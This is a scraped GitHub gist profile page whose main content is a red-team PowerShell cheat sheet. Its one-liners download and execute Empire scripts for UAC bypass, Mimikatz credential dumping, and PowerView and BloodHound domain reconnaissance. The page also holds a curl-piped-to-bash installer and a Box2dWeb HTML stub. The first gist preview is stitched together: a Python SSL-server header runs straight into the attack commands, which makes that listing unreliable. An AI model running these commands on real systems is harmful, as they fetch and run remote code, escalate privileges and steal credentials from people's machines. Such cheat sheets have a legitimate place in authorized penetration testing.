Skip to content

Instantly share code, notes, and snippets.

View gorgogol's full-sized avatar

Nikolaos N. Zisimos gorgogol

View GitHub Profile
@gorgogol
gorgogol / Python SimpleHTTPServer with SSL
Created April 12, 2020 10:19 — forked from rozifus/Python SimpleHTTPServer with SSL
Python SimpleHTTPServer with SSL
# useful for running ssl server on localhost
# which in turn is useful for working with WebSocket Secure (wss)
# copied from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@gorgogol
gorgogol / RedTeam_CheatSheet.ps1
Created August 29, 2019 10:20 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
#!/bin/sh
# Usage: bash < <(curl -s https://gist.github.com/raw/965142/install.sh)
if [ ! -d "/Developer/Applications/Xcode.app" ]; then
echo "Please install Xcode first. Exiting."
exit 1
fi
# Have sudo ask us for our password before we kick everything off so we can walk away.
sudo echo "Here we go..."
@gorgogol
gorgogol / box2dWeb-bootstrap.html
Last active August 29, 2015 14:04 — forked from incompl/gist:4163433
Bootstrap html file for Box2dWeb based game. #javascript #box2dWeb #gamedev
<!DOCTYPE HTML>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Basic Object Behavior</title>
<script src='js/Box2dWeb-2.1.a.3.js'></script>
<style> canavs { background-color:black; } </style>
</head>
<body>